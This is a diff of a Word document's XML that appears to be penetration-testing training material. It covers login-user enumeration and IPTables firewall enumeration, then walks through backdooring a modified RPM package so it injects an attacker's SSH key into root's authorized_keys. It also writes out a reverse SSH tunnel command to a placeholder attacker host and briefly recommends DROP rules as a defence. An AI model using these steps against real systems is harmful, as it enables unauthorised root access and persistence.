+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2790825" cy="5705475"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Found usernames against VirgoDB login endpoint</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Further testing can be conducted and the entire list of COSMA users can be identified using this method.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Firewall Enumeration</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">When specific ports are not allowed to be accessed </w:t>
+      </w:r>
+      <w:r>
+        <w:t>for an externally facing machine</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>on the target network,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">the firewall can be configured with specific rulesets </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">which result in information leakage of the </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">target port availability. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">The specific case here </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">involves IPTables and </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">the </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">distinguishment </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">between </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">a REJECT rule and a DROP rule. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">A REJECT rule within IPTables is designed to be an informative </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">component of IPTables which informs </w:t>
+      </w:r>
+      <w:r>
+        <w:t>any incoming connections the reason</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>which they are unable to connect.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> This can </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">involve the use of ICMP packets </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">which </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">can be accompanied by an error code </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">such as “Administratively Prohibited”. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">This information </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">as an attacker </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">informs us that the target </w:t>
+      </w:r>
+      <w:r>
+        <w:t>port</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is internally available even though it cannot be directly accessed from the external perimeter. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>However,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> we</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> can see </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">outbound </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">traffic is </w:t>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">available from </w:t>
+      </w:r>
+      <w:r>
+        <w:t>any target ports we may be targeting</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, aiding us in the process </w:t>
+      </w:r>
+      <w:r>
+        <w:t>of a client side attac</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">k </w:t>
+      </w:r>
+      <w:r>
+        <w:t>which can subvert</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> concealed</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> firewall rules</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> which</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> are configured within the targets internal network.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Client-side attacks with Malicious RPM Packages</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Linux systems are not vulnerable to the same exploits which would exploit a Windows system. Instead of approaching targets via phishing emails, a potentially stealthy approach can be to craft malicious RPM packages which contain payloads to poison configuration files such as adding public SSH keys into a targets authorized_keys file of their root account in addition to further weaponization of the payload to make such payloads survive persistence.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">The delivery </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">method of this attack can involve </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">poisoning </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">configurations in which a malicious package manager can be included </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">to </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ensure the </w:t>
+      </w:r>
+      <w:r>
+        <w:t>malicious RPM is installed.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>It</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is possible to create a</w:t>
+      </w:r>
+      <w:r>
+        <w:t>n RPM</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> package from scratch with the provided development tools of RPM to then weaponize the package with a malicious payload, which can get injected into the targets machine with root privileges upon installation of the package</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. Root privileges are emphasised since </w:t>
+      </w:r>
+      <w:r>
+        <w:t>root is the only user who is able to install packages into the system.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Most attack methods involve infiltration of network services, web applications and system applications completely avoiding human contact. These methods</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> include but are not limited to:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>P</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ort</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">/ping </w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">weeping, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">port </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">scanning, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">password </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">brute forcing, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">service </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">probing, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">command </w:t>
+      </w:r>
+      <w:r>
+        <w:t>injecting. However, when network defences are heavily updated and heavily fortified with no means of defence evasion without a zero-day exploit; it can be possible to make use of a client side attack.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>A use case example can be an IPTables firewall which does not have means of bypass from an IPv4/IPv6 channel due to tightened defences, in which case a client side attack can be leveraged in order to bypass the enumerated defences. Client side attacks involve building a malicious spec file when building an RPM package.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>When working with the RPM package, the source code of an RPM package should be downloaded rather than the binary. This file contains all patches and a spec file in which the malicious payload is injected. Making use of the tool rpm2cpio allowing a full unpacking of the patch files for the package including the original spec file which needs to be poisoned. The modified spec file contains a payload in which an SSH key is base64 encoded and decoded into the authorized keys file to allow root SSH access to the target seen in figure .</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24F8BED7" wp14:editId="75BDF82C">
+            <wp:extent cx="4953000" cy="1238250"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="18" name="Picture 18" descr="Text&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name="Picture 1" descr="Text&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId31"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4953000" cy="1238250"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The payload can be much further weaponised to establish persistent access even after the package is installed as this serves as the entry point to the system via a stealth payload embedded within the configuration of an RPM package.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">From this point, the spec file should be modified out of the unpacked package injecting payload inside it. The way in which this RPM is built uses a post-installation script embedded in the spec file. Building the RPM with the custom specification file which contains the payload using: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>rpmbuild</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ba</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>(spec filename) This will build a new binary which would be served to a target hosted within an attacker controlled HTTP server offering the package.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">The attacker would host </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">the newly </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">built </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">malicious RPM package </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">which contains the </w:t>
+      </w:r>
+      <w:r>
+        <w:t>custom spec file as seen in figure 2.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13E6A76C" wp14:editId="12B1A265">
+            <wp:extent cx="5731510" cy="689610"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="19" name="Picture 19"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId32"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="689610"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">To initiate the attack, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">some social engineering to the target </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">would be required </w:t>
+      </w:r>
+      <w:r>
+        <w:t>prompting them to download an update to a tool which they may commonly use</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> link would be sent to download this malicious package gaining entry to the network</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. Social engineering is not covered in this</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> training material</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Currently the attacker can’t SSH into the machine due to having no public key injected. This is seen in figure 3.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43AFAD18" wp14:editId="45905898">
+            <wp:extent cx="5731510" cy="486410"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
+            <wp:docPr id="20" name="Picture 20"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId33"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="486410"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Upon installation of the package which the target downloads and installs, entry will be gained. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DA3A81E" wp14:editId="1A756C21">
+            <wp:extent cx="5731510" cy="1045845"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
+            <wp:docPr id="21" name="Picture 21" descr="Text&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="4" name="Picture 4" descr="Text&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId34"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="1045845"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Seen in figure 4 the target installs the package, without performing the correct checks first, the target has injected an attackers SSH public key for them to access the machine via root. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25C1F0AD" wp14:editId="1C3AE9A7">
+            <wp:extent cx="4705350" cy="714375"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="22" name="Picture 22" descr="Text&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="5" name="Picture 5" descr="Text&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId35"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4705350" cy="714375"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Figure 5 shows an attacker gaining successful backdoor access to a target device over the SSH channel. In situations with security defences, the payload can be carefully crafted to traverse out of firewalled ports which may prevent incoming traffic but may allow outbound traversal. As a result, an attacker could establish an SSH reverse shell through which a tunnel goes out of the defended machine leading to exposure via an allowed outbound port.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">One method can involve making a reverse SSH tunnel to an attacker owned machine which carries a /bin/false account. A payload of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ssh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>f</w:t>
+      </w:r>
+      <w:r>
+        <w:t>N</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -R</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:t>200</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">:127.0.0.1:22 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>account@attacker-ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>How can I protect my organisation</w:t>
+      </w:r>
+      <w:r>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>A counterpart which can act</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">as a </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">patch of </w:t>
+      </w:r>
+      <w:r>
+        <w:t>information</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> gathering </w:t>
+      </w:r>
+      <w:r>
+        <w:t>is to make use of the DROP firewall rule in IPTables</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">With use of the DROP option in IPTables we can </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">avoid information disclosure </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">of internal ports </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">preventing an attacker </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">from </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">gaining information </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">against the externally </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">facing </w:t>
+      </w:r>
+      <w:r>
+        <w:t>machine.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Internal Perimeter Testing</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Internal firewalking</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Internal </w:t>
+      </w:r>
+      <w:r>
+        <w:t>firewalking</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Privilege Escalation</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Post-exploitation</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Physical Security</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Appendix</w:t>
       </w:r>
     </w:p>
@@ -7312,7 +8683,3017 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Appendix 1: </w:t>
+        <w:t>Appendix 1:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> read-harvester.py</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>import json</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>import sys</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">def </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>read_json</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>json_harv_file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    with open('{}'.format(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
